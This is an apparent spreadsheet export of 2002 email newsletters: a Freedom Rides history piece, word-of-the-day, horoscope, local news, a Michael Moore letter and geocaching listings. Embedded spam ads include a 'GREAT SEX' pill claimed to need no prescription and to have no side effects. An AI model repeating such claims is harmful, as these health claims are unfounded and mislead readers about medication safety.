            - Do you enjoy this publication? -Then give your friends a FREE GIFT SUBSCRIPTION to it today. 
Just click below and "Shag-a-Friend"! http://www.sendoutmail.com/shag_friend2.asp?l=history
Give a Gift Subscription! 
============================================================ 
AOL users: look for your links at the bottom of the page. 
------------------------------------------------------------            -  WTC Commemorative Pin  -
             * We Will Never Forget *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$29.99.
Order today!
         http://ads.pulsetv.com/al/a?aid=521&amp;ent=533Click Here------------------------------------------------------------The Freedom Rides
By Denis MuellerAt the end of World War II, the United States was a rigidly 
segregated country but there were cracks beginning to show. 
In 1946, the Supreme Court ruled that ruled that segregated 
seating on interstate transportation was illegal. In 1947, 
the Congress of Racial Equality (CORE) decided to challenge 
the racist system. The opposition was fierce and the riders 
were jailed often ending up on chain gangs.By 1961, the time was right to challenge America's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             * S E X...S E X...S E X...S E X *
            NOW THAT WEï¿½VE GOT YOUR ATTENTION...Introducing GREAT SEX -- the ONLY pill of its kind fortified 
with nature's most POTENT MOOD ENHANCERS. Unleashes the 
uncontrollable passion hidden deep inside. Unlike Costly 
"drugstore" formulas GREAT SEX is:- Available now WITHOUT doctor's prescription! 
- For BOTH men and women! 
- Costs just PENNIES per capsule 
- Can be used as often as desired 
- Has NO unwanted side-effects Don't wait, put the physical desire back into your love life.
Order now for only $14.99, or SAVE on 2 or more by visiting:
          http://ads.pulsetv.com/al/a?aid=521&amp;ent=651
AOL Users Click Here------------------------------------------------------------ On May 4th, 1961 they set out to New Orleans. In the upper 
south they met no resistance but by the time they got to 
Alabama they were met by an angry band of terrorists who 
slashed the tires and burned the bus. In Birmingham it was 
worse. The FBI, through its informant James Rowe, were well 
aware that the Ku Klux Klan was waiting for them. So were 
the Birmingham police, led by Chief of police Bull Conner, 
and when they arrived they were severely beaten. Despite the warnings there were no police to protect them. 
Governor Patterson showed no mercy and blamed the riders. 
So the terrorist attacks went on. The "Freedom Riders" were 
determined to continue and were joined by a group of Nash-
ville students. They were met by hostility and were arrested 
and sent back to Tennessee. But the riders were fearless and 
immediately returned to Birmingham ready to continue the 
journey.------------------------------------------------------------    ---------&gt; The Paranormal Insider Is Here! &lt;---------ShagMail is PROUD to introduce our one and only paranormal 
investigator, Gus. Once a week he will explore the most 
intriguing cases of paranormal incidents reported. ESP, alien 
sightings, angels, ghosts and much more. Every issue is a gem!
To subscribe to this for FREE just click on the link below.
	 http://www.shagmail.com/welcome.fc?15004Subscribe to The Paranormal Insider for FREE------------------------------------------------------------ Meanwhile, their plight became international news and 
"Freedom Riders" left Birmingham on May 20th determined to 
continue. State officials had promised Attorney General Robert 
Kennedy they would be protected, but by the time they reached 
Montgomery there were no state police in sight. Seeing a mob, 
the riders feared for their lives, but Jim Zwerg, a white man, 
bravely walked out of the bus and was nearly beaten to death. 
He still suffers from the effects but his courage was un-
deniable. Others including Justice Department official John 
Seigenthaler were also beaten.The situation seemed to be out of control and federal inter-
vention finally saved the day with Governor Patterson declar-
ing martial law. Robert Kennedy called for a cooling off 
period but the riders refused. They would continue on. So 
they set off to Jackson, Mississippi but  Kennedy had made a 
deal with Mississippi officials. They were supposed to be 
protected, but upon arriving they were arrested. Kennedy had 
caved in. It was a cowardly decision by the Attorney General 
and the riders were sentenced for 60 days for exercising 
their constitutional rights. They never finished their trip 
but their courage showed the power of civil disobedience and 
in the end justice would prevail and terrorism would be 
defeated. It is another example of how people change things, 
not government officials.Sources: Eyes on the Prize------------------------------------------------------------ 
Questions...Comments..Email us at: mailto:denis@shagmail.com 
Email Forgotten History 
************************************************************ To SUBSCRIBE visit: http://www.shagmail.com/sub/history.html 
*** 
To UNSUBSCRIBE visit: http://www.shagmail.com/unsub/history.html 
*** 
Want some Fun and Amusements in your email box FREE! Visit: 
                 http://www.shagmail.com ------------------------------------------------------------ 
                       AOL Links 
------------------------------------------------------------ Subscribe
Unsubscribe
More FREE Fun and Amusements 
____________________________________________________________ END OF FORGOTTEN HISTORY 
Copyright 2002 by Pulse Direct, Inc. All rights reserved. 
Feel free to forward this, in its entirety, to others.
---
You are currently subscribed to history as: mothlight@fastmail.fm
</t>
  </si>
  <si>
    <t xml:space="preserve">                    *  WORD A DAY  *
------------------------------------------------------------
Do you enjoy this publication? Then give your friends a FREE 
GIFT SUBSCRIPTION. Just click below and "Shag-a-Friend"! 
    http://www.sendoutmail.com/shag_friend2.asp?l=word 
Give a Gift Subscription!
------------------------------------------------------------Fellow Logophiles,Hello and good morning! My name is Shannon and I am your new 
daily provider of words. Did you know that the word "set" has 
the most definitions in the English language? The Oxford 
English Dictionary lists 464 definitions of this word. I love 
receiving your emails so please keep them coming! Let me know 
what you would like to see in this newsletter. Now on with 
today's edition!  Sincerely,
Shannon                             *
   Collector's Series Train Pocket Knife Is Now FREE!If you are looking for unique styling in a pocketknife, look 
no further. Introducing the collector's series Commemorative  
Steam Engine Pocket Knife. Measuring approximately 7" fully 
extended, the one-of-a-kind pewter handle depicts a classic 
Steam Engine Train as it journeys through the dense forests on 
way to it's destination. The sharp blade (3 in") is made of 
durable stainless steel and each knife is specially packaged
in a Cherry Wood designed custom Gift Box with a colored Steam
Engine Photograph and inlaid with black felt. You can order 
one or two today for FREE! (s&amp;h $8.87) by visiting:
         http://ads.pulsetv.com/al/a?aid=502&amp;ent=744Click Here To Order
                             *
WORD: coruscate  \KOR-uh-skayt\  (intransitive verb):  To give off or reflect bright beams or flashes of light; 
   to sparkle.
:  To exhibit brilliant, sparkling technique or style. 
SYNONYMS:  *reflect 
           *shineEXAMPLE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
           Open Any Jar Using Your Amazing...
                     SUPER GRIP!* As Seen On TV
* Buy one - Get one FREE!Now... you can open any jar, turn any knob or twist-off any 
cap with remarkable ease! Super grip is the amazing household 
power tool that up to triples your own wrist strength! Imagine, 
no more struggling or teeth-gritting over tight lids, caps and 
knobs. Super-grip is super strong too -- rugged polycarbonate 
handle and rubberized gripper makes this the most handy and 
durable tool you can own. Hurry... order now and get (2) Super Grips for the price of 
one! To order visit: http://ads.pulsetv.com/al/a?aid=502&amp;ent=863Click Here To Order
                             *
BONUS WORD OF THE DAY: commodious \kuh-MOH-dee-us\ (adjective): Comfortably or conveniently spacious; roomy; as, a commod-
  ious house. WORD WISE: Commodious derives from the Latin commodus, "con-
forming to measure, hence convenient or fit for a particular 
purpose," from com-, "with" + modus, "measure."                  OBSCURE AND UNUSUAL WORDS
                  *************************
1) echinate  \ek'in-at\  (adjective)
   : prickly, bristled
2) hodiernal  \ho-di-ur'nel\  (adjective)
   : pertaining to today
------------------------------------------------------------
Questions... Comments... email us at: mailto:word@shagmail.com
Send us your comments
************************************************************To SUBSCRIBE: http://www.shagmail.com/sub/sub-word.html To UNSUBSCRIBE: http://www.shagmail.com/unsub/word.html ------------------------------------------------------------
                       AOL Links
************************************************************Subscribe
Unsubscribe
____________________________________________________________END OF WORD A DAY - Another FREE ShagMail publication   
http://www.shagmail.comCopyright 2002 by Pulse Direct, Inc. All rights reserved.
Feel free to forward this, in its entirety, to others.---
You are currently subscribed to word as: mothlight@fastmail.fm
</t>
  </si>
  <si>
    <t>-----------------------------------------------------------------
                         Back to school!
           Find out what's in store for September with
               a One Month Forecast for only $4.95!
  http://www.chartshop.com/scripts/runisa.dll?AO:495SHOP::DAILY
-----------------------------------------------------------------Greetings  --Here is your horoscope for Saturday, August 31:August is over, and Aquarius is looking forward to next month's new 
season. Excitement is tinged with anticipation. A relationship benefits 
wonderfully from your current surge of vitality.
Until tomorrow,Kelli Fox, Your Astrologer
http://www.astrology.com
http://www.chartshop.com
http://www.ivillage.comSneak a peek at the future with tomorrow's horoscope! 
http://horoscopes.astrology.com/index/dailyindextom.html-----------------------------------------------------------------
                      Looking for Mr. Right?
            Take this quiz to narrow down your search.
     http://quiz.ivillage.com/astrology/tests/mrrightquiz.htm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annmn:[73eyn03eyn4prCg0120022u003eyn0mHe4BHe7m]</t>
  </si>
  <si>
    <t>Ashfield Online email subscription (Sunday, September 1, 2002)
Ashfield Online Â© 2002 Aric McKeown Comic for Sunday, September 1, 2002
Powered by FLASH(A Keenspot Comic)
Visit the Ashfield Online website at www.AshfieldOnline.com.
Note: If you do not see a comic in this email and you read your email
offline, you may need to connect online to load the images.  You must also
be able to read HTML-encoded email.If mail sent to your account is returned as undeliverable two or more times,
your email address may be removed from this list.  This may occur if you go
over your mail provider's quota or for various other reasons.Do not reply to this email.  This is an automated mailing list and replies
are not read.  Direct comments and inquiries to the author of this comic
or to help@keenspot.com.
Please be sure to indicate the comic to which you are referring.To unsubscribe from this list, go to http://www.keenspot.com/unsubscribe.htmlTo subscribe to a new list or to resubscribe to this list if you are unsubscribed, go to http://www.keenspot.com/subscribe.html</t>
  </si>
  <si>
    <t xml:space="preserve">Berkshire Eagle    .articleBody  {
      font-family:verdana, arial, helvetica;
      font-size:13px;
    }
    .articleByline  {
      font-family:verdana, arial, helvetica;
      font-weight:normal;
      font-style:italic;
      font-size:13px;
      height:30px;
    }
    .articleDate  {
      font-family:verdana, arial, helvetica;
      font-size:11px;
    }
    .articleHeadline  {
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:18px;
      height:36px;
      text-align:left;
    }
    .articleImageCaption  {
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:9px;
    }
    .articleOptions  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:8px;
      text-decoration:none;
      vertical-align:middle;
    }
    .articleOptionsHead  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:normal;
      font-size:8px;
    }
    .articleOptionsTop  {
      color:#999999;
      font-family:verdana, arial, helvetica, sans-serif;
      font-weight:bold;
      font-size:8px;
      text-decoration:none;
      vertical-align:middle;
    }
    .articleOverline  {
      font-family:sans-serif, arial, helvetica;
      font-weight:normal;
      font-size:12px;
      height:24px;
      text-align:left;
    }
    .articlesFrom  {
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .articleSubHeadline  {
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:14px;
      height:30px;
    }
    .breakNewsBox  {
      color:#000000;
      background-color:#FFFFFF;
      width:200px;
      text-align:left;
      border-width:1px;
      border-color:#666666;
      border-style:solid;
    }
    .breakNewsHead  {
      color:#FFFFFF;
      background-color:#00008B;
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-style:normal;
      font-size:14px;
      text-decoration:none;
      border-style:ridge;
    }
    .breakNewsLink  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:verdana, arial, helvetica;
      font-size:11px;
    }
    .breakNewsSection  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:11px;
      text-decoration:none;
    }
    .content  {
      color:#000000;
      background-color:#ffffff;
      font-family:ans-serif, arial, helvetica;
      font-size:10px;
    }
    .date  {
      color:#000000;
      font-family:arial, sans-serif, helvetica;
      font-weight:bold;
      font-size:9px;
    }
    .homeArticleBlurb  {
      font-family:verdana, arial, helvetica;
      font-size:12px;
    }
    .homeArticleLinkText  {
      color:#000000;
      font-family:verdana, arial, helvetica;
      font-size:12px;
    }
    .homeArticleTitle  {
      color:#000000;
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .homeSectionTitle  {
      color:#FFFFFF;
      background-color:#00008B;
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-style:normal;
      font-size:14;
      width:55%;
      text-decoration:none;
      border-style:inset;
    }
    .nav  {
      background-color:#FFFFFF;
    }
    .navaa  {
      color:#000099;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:13px;
      text-decoration:none;
      text-indent:2px;
    }
    .navab  {
      color:#CC3333;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:13px;
      text-decoration:underline;
      text-indent:2px;
    }
    .navba  {
      color:#000099;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
      height:15px;
      text-decoration:underline;
      text-indent:7px;
    }
    .navbb  {
      color:#CC0000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:normal;
      font-size:10px;
      height:15px;
      text-decoration:underline;
      text-indent:7px;
    }
    .navca  {
      color:#999999;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
      height:15px;
      text-decoration:underline;
      text-indent:12px;
    }
    .navcb  {
      color:#CC0000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:normal;
      font-size:10px;
      height:15px;
      text-decoration:underline;
      text-indent:12px;
    }
    .nmoMastHead  {
      background-color:#FFFFFF;
      text-align:center;
    }
    .otherArticlesBox  {
      background-color:#FFFFFF;
    }
    .otherArticlesDate  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
      text-align:center;
    }
    .otherArticlesHead  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:normal;
      font-size:10px;
    }
    .otherArticlesLink  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
    }
    .otherArticlesTitle  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:normal;
      font-size:10px;
    }
    .packageHead  {
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .packageLink  {
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
    }
    .pageBottomLinks  {
      color:#000099;
      font-family:arial, verdana, sans-serif;
      font-size:12px;
      text-decoration:underline;
    }
    .pageBottomTitle  {
      color:#FFFFFF;
      background-color:#000066;
      font-family:arial, verdana, sans-serif;
      font-weight:bold;
      font-size:16px;
    }
    .pageLeftLinks  {
      color:#000066;
      font-family:arial, sans-serif, verdana;
      font-size:11px;
      text-decoration:none;
    }
    .pollsAnswer  {
      color:#000000;
      font-family:sans-serif, arial, helvetica;
      font-size:11px;
      vertical-align:top;
    }
    .pollsBox  {
      background-color:#FFFFFF;
      width:120px;
      border-width:2px;
      border-color:#EEEEEE;
      border-style:outset;
    }
    .pollsHead  {
      color:#000000;
      background-color:#9999FF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
      text-align:center;
      border-width:2px;
      border-color:#EEEEEE;
      border-style:outset;
    }
    .pollsQuestion  {
      color:#000000;
      font-family:sans-serif, arial, helvetica;
      font-size:11px;
      text-align:center;
    }
    .pollsViewResults  {
      color:#000066;
      font-family:sans-serif, arial, helvetica;
      font-style:italic;
      font-size:14px;
      text-align:center;
    }
    .redbody  {
      color:#FF0000;
      font-family:arial, verdana, helvetica;
      font-weight:bold;
      font-size:13px;
    }
    .searchBody  {
      color:#000000;
      background-color:#CCCCCC;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:12px;
    }
    .searchBox  {
      background-color:#CCCCCC;
      border-width:2px;
      border-color:#000000;
      border-style:groove;
    }
    .searchHead  {
      color:#FFFFFF;
      background-color:#000000;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .searchNew  {
      color:#0033FF;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:10px;
      text-decoration:none;
    }
    .searchPages  {
      color:#660099;
      font-family:sans-serif, arial, helvetica;
      font-size:12px;
    }
    .searchQuery  {
      color:#000000;
      font-family:sans-serif, arial, helvetica;
      font-size:12px;
    }
    .searchResultAuthor  {
      color:#000000;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:10px;
    }
    .searchResultBody  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:12px;
    }
    .searchResultDate  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:12px;
    }
    .searchResultLinkTitle  {
      color:#0033FF;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .searchResultSection  {
      color:#000000;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .sectionArticleBlurb  {
      font-family:verdana, arial, helvetica;
      font-size:12px;
      text-align:justify;
    }
    .sectionArticleTitle  {
      color:#000066;
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:14px;
    }
    .sectionImageCaption  {
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:10px;
    }
    .sectionLinkText  {
      color:#000066;
      font-family:verdana, arial, helvetica;
      font-size:11px;
    }
    .sectionSectionTitle  {
      color:#000000;
      font-family:verdana, arial, helvetica;
      font-weight:bold;
      font-size:25px;
    }
    .simpleSearchHead  {
      color:#999999;
      background-color:#FFFFFF;
      font-family:verdana, arial, helvetica;
      font-size:9px;
    }
    .simpleSearchLink  {
      color:#999999;
      background-color:#FFFFFF;
      font-family:verdana, arial, helvetica;
      font-size:9px;
      text-decoration:none;
    }
    .simpleSearchText  {
      color:#000000;
      background-color:#FFFFFF;
      font-family:verdana, arial, helvetica;
      font-size:9px;
    }
    .time  {
      color:#000000;
      font-family:arial, sans-serif, helvetica;
      font-size:9px;
    }
    .topNavBar  {
      background-color:#003463;
    }
    .weatherBox  {
      background-color:#FFFFFF;
      width:120px;
      border-width:1px;
      border-color:#00659C;
      border-style:solid;
    }
    .weatherContent  {
      border-width:3px;
      border-color:#FFFFFF;
      border-style:solid;
    }
    .weatherHead  {
      color:#FFFFFF;
      background-color:#00659C;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:10px;
      text-align:center;
    }
    .weatherHigh  {
      color:#FF0000;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
    }
    .weatherLow  {
      color:#3399FF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
    }
    .WthrDay  {
      font-family:Arial, Helvetica, sans-serif;
      font-weight:bold;
      font-size:12px;
      text-align:center;
    }
    .WthrDayInfo  {
      font-family:Arial, Helvetica, sans-serif;
      font-size:11px;
      text-align:center;
    }
    .WthrDetailed  {
      font-family:Arial, Helvetica, sans-serif;
      font-weight:normal;
      font-size:12px;
      text-align:left;
    }
    .WthrEven  {
      background-color:#FFFFFF;
      font-family:verdana;
      font-size:11px;
    }
    .WthrHi  {
      color:#CC0033;
      font-family:arial;
      font-weight:bold;
      font-size:12px;
    }
    .WthrIcon  {
      text-align:center;
    }
    .WthrLink  {
      color:#003399;
      font-family:arial;
      font-size:12px;
      text-align:center;
    }
    .WthrLow  {
      color:#3366CC;
      font-family:arial;
      font-weight:bold;
      font-size:12px;
    }
    .WthrOdd  {
      background-color:#CCCCCC;
      font-family:verdana;
      font-size:11px;
    }
    .WthrRule  {
      color:000099;
      background-color:000099;
      height:1px;
    }
    .WthrSubTitle  {
      font-family:Arial, Helvetica, sans-serif;
      font-weight:bold;
      font-size:13px;
    }
    .WthrText  {
      color:#666666;
      font-family:Arial, Helvetica, sans-serif;
      font-style:italic;
      font-size:12px;
    }
    .WthrTitle  {
      color:000099;
      font-family:Arial, Helvetica, sans-serif;
      font-weight:bold;
      font-size:14px;
    }
    a:hover.navaa  {
      color:#0000FF;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-weight:bold;
      font-size:13px;
      text-decoration:underline;
      text-indent:2px;
    }
    a:hover.navba  {
      color:#0000FF;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
      text-decoration:underline;
      text-indent:7px;
    }
    a:hover.navca  {
      color:#0000FF;
      background-color:#FFFFFF;
      font-family:sans-serif, arial, helvetica;
      font-size:10px;
      height:15px;
      text-decoration:underline;
      text-indent:12px;
    }
    a:hover.pageLeftLinks  {
      color:#000066;
      font-family:arial, sans-serif, verdana;
      font-size:11px;
      text-decoration:underline;
    }
To unsubscribe, use the link at foot of this page.Breaking NewsLocal Headlinesâ€¢Â Car with young driver said to swerve near police cruiserâ€¢Â Foundation wins grant to plan rinkâ€¢Â Illustrator writes a book on bridgeSports Headlinesâ€¢Â A's used Tejada's dramatics to claim 18th straight winâ€¢Â Baseball throws brushback pitch at fan Web sitesâ€¢Â Bears triumph in QuebecToday's Editorialsâ€¢Â Waiting for PEER to make its caseToday's Headlines	&lt;!-- // Hide from older browsers
	function openEnlarged(url, width, height) 
	{
		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}	function showVideo(url, width, height) {
		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}
	// --&gt;Lieutenant governor's race competitive, uniqueBOSTON -- Mitt Romney flinched when asked about the possibility of being forced to campaign with James Rappaport instead of his hand-picked running mate, Kerry Healey.... MoreLOCAL NEWS	&lt;!-- // Hide from older browsers
	function openEnlarged(url, width, height) 
	{
		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}	function showVideo(url, width, height) {
		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}
	// --&gt;'Dream' jobs vs. real jobs Couples juggle life and laborLabor Day delivers a break from tedious work tasks for much of the country's work force, but young Griffin Gageant recently seemed eager to launch a plan for his life's labor.... MoreSPORTS	&lt;!-- // Hide from older browsers
	function openEnlarged(url, width, height) 
	{
		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}	function showVideo(url, width, height) {
		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}
	// --&gt;Wood or aluminum: MIAA to decideThe Massachusetts Interscholastic Athletic Association, the governing body of scholastic sports in the state, will be meeting later this month to discuss the possibility of using wooden bats for the 2003 scholastic baseball postseas... MoreCOMMENTARY	&lt;!-- // Hide from older browsers
	function openEnlarged(url, width, height) 
	{
		wid = window.open(url, "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}	function showVideo(url, width, height) {
		wid = window.open(url + '?path=', "EnlargedImage", "toolbar=no,status=yes,directories=no,location=no,scrollbars=yes,width="+ width +",height="+ height +",resizable=yes");
		wid.focus();
	}
	// --&gt;Emily Post evolvesThe New York Times announcement last month that the paper will add same-sex unions to its wedding announcements provides a nice boost to the cause of gay rights. The Times, however, is only acknowledging a healthy social phenomenon that's been building fo... Moreï¿½
Special Sections
EntertainmentAntiques Guide
Auto Showcase
Berkshire
Business
Berkshires Week
Berkshires 2030
Community
Dot Com Directory
Golden Years
Health Quarterly
Home Improvement
Summer Preview
Outdoor Living
Wedding Planner
Arts/Entertainment
Books
Movie Schedules
Movie Reviews
Theater Reviews
Columnists
Lotteries
Headbone Zone
SportZone
Personals
What's Doing?
Week's Calendar
Photo Reprints
click to unsubscribe from newsletter or change format
</t>
  </si>
  <si>
    <t xml:space="preserve">On The Way to Telluride, On My Way Back to the World8/29/02Dear friends,I go to turn my computer on but I have forgotten where the on/off switch
is. I have had this laptop for three years, but I haven't turned it on for
the past two months. I look on its left side, I feel around the back, I
find it on the right and I feel like an idiot. The screen reads "fatal
error" and offers to "save" whatever I had typed on it last June 21st, a
few weeks before my mother died. I hit CTL.ALT.DEL.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parent's living room, and mom would come in and out of the
room, catching a scene here and there, saying, "Boy, that's something,
isn't it!" I don't feel right, right now. I have avoided most people for the past two
months. I can't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what's being said. They agreed to the terms, but as Bob Novak asked his first question about
aren't my true motives to destroy capitalism and make America a socialist
country, I just sat there for a moment and didn't respond. I thought I
would just take the microphone off and leave - who needs these f-----s! -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we're going to seize your money first! I asked the studio audience in DC
for a show of hands of all those who agreed and I was later told that
numerous hands shot up in the air, much to the chagrin of a stunned Bob
Novak. I also added that I thought the Pope was onto something when he said
that capitalism is a "sin."My dad liked that. He is a sweet, strong, smart man and I loved the drive
with him back home. We took a spin through the Michigan State campus and he
told me how he had come down here after World War II to inquire about going
to college but thought it best to return to the assembly line where he had
a secure job. His years during the war serving in the Marines were going to
be counted toward his seniority. And so he worked the spark plug and oil
filter assembly line for 33 years and provided for mom and us kids and gave
us all his love -- which, of course, mattered the most.                       *        *       *       *       *        *Dad took me to the airport this morning, remarking on the way how much mom
would have enjoyed this simple trip across town to Bishop Airport, how
happy she would have been knowing that I was heading off on a new journey
in my very fortunate life. I thought about how she came to New York for the
screening of "Roger &amp; Me" at the New York Film Festival in 1989, and how I
got to introduce her and my aunt as they sat in the front of the balcony,
and how mom and Aunt Lois stood and took a long Lincoln Center bow, and how
I stood on that stage and felt that she deserved every bit of that applause
and more. It's a bittersweet memory now, as I've just found out that the NYFF
selection committee this year is too afraid to show my new film.
"Politics," is what I have been told. Too "populist" for the new elite who
now sit in judgment of what is art. "They don't want to help further your
platform Mike," a person close to the committee tells me. "One of them even
said, 'I know this film is going to be popular - and I don't personally
want to contribute to its popularity.'"  So, it was decided that "Bowling
for Columbine," a Cannes prize-winner, knighted by the Chicago Tribune as
"one of the most effective political/polemical films ever," a film chosen
by every single film festival around the world this fall - no, this film
must not be shown at Lincoln Center just six blocks from the edit room
where we made it... 77 blocks north of ground zero. I've gone too far this
time, cut too close to the bone, stuck my lens where it doesn't belong -
right straight through the heart of an America that is both master and
victim of the ultra-violence. It is so sad to see this place where I will
always remember my mother taking that bow now cowering to the whims of neos
who, like their counterparts in Hollywood, preside over the demolition of a
once great art form.                     *      *      *      *      *      *      *My dad drops me off and goes to park in the short-term lot. He comes inside
just as the airport personnel are taking everything out of my suitcase for
inspection. They don't ask to see the print of the film, the only thing I
might have had on me that is poised to do any real damage (to all the right
people, of course). My dad and I stop short of the metal detectors and the
next round of inspectors who are anxious to look at my smelly feet. We hug,
and he kisses me, and I am trying hard, so very hard, to not break down in
the middle of this airport. He tells me not to worry about him, and I tell
him I'll call him from Detroit when I am changing planes. I go through
security and as I am being taken aside to be searched again, I look back
and see him still standing there, watching out for me. My dad.I'm on the plane and I'm thirsty, but I took the water bottle out of my bag
when I packed it this morning. The bottle, half-drank, had been sitting
untouched in my untouched bag since I stuck it in there the night we had to
rush my mom to the hospital. The bottle was still there in that overnight
bag where I put my t-shirt and sweatpants, the ones I had on for the night
and day I sat by my mother's side in the hospital as she struggled to live,
holding her hand, holding her head, trying to comfort her, strands of hair
on my sweater. I can see the stains from where my tears and mucus ran
uncontrollably down my face and onto that sweater. The doctor said she had
an 80% chance of making it. An hour before she died, another doctor said
the chances were 1 in 100. That was good enough for me. One in one hundred!
I've had those odds! I won! Don't let her die! Please do everything you can
do! Don't let her die.The priest came, then another priest came, and when the priests left my dad
asked us three kids and the three grandkids to all join hands and say our
goodbyes to mom, say whatever we wanted to about what she meant to us. (I
am sorry... I cannot complete this paragraph right now, I can't see the
screen through the tears...maybe someday...)The night before we rushed her to the hospital I had a little surprise
planned for her. I had brought a copy of my new movie and I was going to
show it to her. As the end credits would roll, she would get to see what
she has seen at the end of all of my work: her name along with my dad's in
that list of credits...and, to me, it's the only real credit that ever
mattered -- because without them I would not have the life they gave me,
the way they raised me... it is all a privilege I will never cease being
thankful for.I never got to show her the movie that night. "Mike!" she called out from
the porch, in a pitch of voice I had never heard. "Get your father! I don't
feel good." She was, without warning, dying. Within 48 hours she would be
gone.                 *          *          *          *          *          *I'm walking through the Detroit airport to gate 75 for the flight to
Denver, and I hear someone say, "OK, Mr. Stuckup, just walk right on by!" I
turn to see it is one of anchors from the local TV station in Flint. I
apologize. My sunglasses are on. I have been crying since I left my dad at
the Flint airport. I explain this to her and she starts to get tears in her
eyes. "My mom died in October," she says, and I realize that this pain that
feels so solitary is, truthfully, a shared experience amongst us all. No
one is immune from this loss. But instead of taking the time to tell me
about how rough it has been for HER, she asks about how I am doing and how
is my dad doing and did we get the flowers she and the others sent. She
gives me her number and says to call anytime if I feel the need to talk. At
that moment I remember what she told me -- that her mother also died this
year-- and I think, man, get over yourself, Mike, you are not alone in
this, and so I ask her how she is doing. "I think a lot," she says, "about
all the things she won't see my two children grow up to do, to be. But I
believe she is in my heart, right here, right now, and she will see it
all."They call my flight and I rush over to the payphone to call my dad to see
if he got home OK. He tells me that when he left the short- term lot he got
talking to the person in the tollbooth who told him about her mother
getting cancer and how she was caring for her. "She said that her bill in
the hospital came to $60,000," he says with astonishment. "They won't be
able to pay it. She makes six dollars an hour, no health insurance. I gave
her a tip along with the toll.""You gave the tollbooth worker a tip?""Well, you have to. That person could be you or me."That is my father. That was my mother. Yours, Michael Moore
mike@michaelmoore.com
http://www.michaelmoore.comPS. Thank you, all of you, who sent me your condolences and who contributed
to the local poverty program in my mother's name. I was so moved by your
generosity and by your words of love and kindness. It will never be
forgotten.
---If you wish to be be unsubscribed from this mailing list, please click the
link below and follow the instructions.http://www.michaelmoore.com/mailing/unsubscribe.php
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Geocaching.com -
Recent caches in your area...9/2/2002 (Texas)
Fish Eye View by Silly Squadron
(Traditional Cache) (GC8917) (2.04 miles NW)
http://www.geocaching.com/seek/cache_details.asp?ID=350959/2/2002 (Texas)
Ponce de Leon by Mudbug
(Traditional Cache) (GC8889) (12.25 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=3495310/27/2002 (Texas)
NTGA Org. Meeting/Class by Wolf Song
(Event Cache) (GC81C2) (25.8 miles SW)
